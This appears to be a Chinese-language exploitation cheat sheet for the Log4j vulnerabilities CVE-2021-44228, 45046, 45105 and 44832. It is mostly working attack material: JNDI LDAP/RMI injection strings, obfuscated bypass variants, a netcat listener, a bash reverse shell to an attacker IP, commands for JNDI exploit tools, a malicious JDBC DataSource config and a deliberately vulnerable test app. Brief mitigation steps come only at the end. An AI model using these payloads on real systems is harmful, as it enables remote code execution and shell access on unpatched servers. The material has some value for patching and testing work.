Apache Log4j 2.14.1
CVE-2021-44228
${jndi:ldap://xxx.dnslog.cn/exp}
# Bypass
${j${lower:n}di:l${lower:d}ap://xxx.dnslog.cn/exp}
$ nc -lvnp <Port>
$ java -jar JNDIExploit-1.2-SNAPSHOT.jar -i <IP>
# -l <LDAP_Port> , 默认1389
# -p <HTTP_Port> , 默认8080
# 触发: 通过cmd参数传递命令
${jndi:ldap://<IP>:<LDAP_Port>/TomcatBypass/TomcatEcho}
# 反弹Shell
/bin/bash -c 'bash -i >& /dev/tcp/<IP>/<NC_Port> 0>&1'
# bash -i >& /dev/tcp/<VPS_IP>/<Port> 0>&1 # Base64编码
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "<编码字符串>" -A "<VPS_IP>"
# 触发
${jndi:rmi://<IP>:<Port>/xxxxxx
${jndi:ldap://127.0.0.1:1389/ badClassName}
CVE-2021-45046
${jndi:ldap://127.0.0.1}
CVE-2021-45105
CVE-2021-44832, 通过
JDBCAPPENDER
的DataSource
元素RCE
<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="error">
<Appenders>
<JDBC name="databaseAppender" tableName="dbo.application_log">
<DataSource jndiName="java:/comp/env/jdbc/LoggingDataSource" />
<Column ...
</JDBC>
</Appenders>
...
</Configuration>
<DataSource jndiName="ldap://127.0.0.1:1389/Exploit"/>
${lower:test}
${upper:qwer}
${hostName} # 主机名
${java:version} # Java版本
${java:vm}
${java:runtime}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}
X-Api-Version
字段存在漏洞,利用方法一样。这个弹不到Shell,但是有请求记录# java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "<CMD>" -A <IP>
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open /System/Applications/Calculator.app" -A 127.0.0.1
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
public class log4j {
private static final Logger logger = LogManager.getLogger(log4j.class);
public static void main(String[] args) {
System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
logger.error("${jndi:ldap://127.0.0.1:1389/xxx}");
}
}
pom.xml
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<groupId>org.example</groupId>
<artifactId>log4j-rce</artifactId>
<version>1.0-SNAPSHOT</version>
<dependencies>
<!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core -->
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.14.1</version>
</dependency>
<!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-api -->
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-api</artifactId>
<version>2.14.1</version>
</dependency>
</dependencies>
</project>
-Dlog4j2.formatMsgNoLookups=true
LOG4J_FORMAT_MSG_NO_LOOKUPS
设置为 true
log4j2.component.properties
文件,文件中增加配置 log4j2.formatMsgNoLookups=true
$ zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
版权属于:Naraku
本文链接:https://cloud.tencent.com/developer/article/1946434
本站所有原创文章均采用 知识共享署名-非商业-禁止演绎4.0国际许可证 。如需转载请务必注明出处并保留原文链接,谢谢~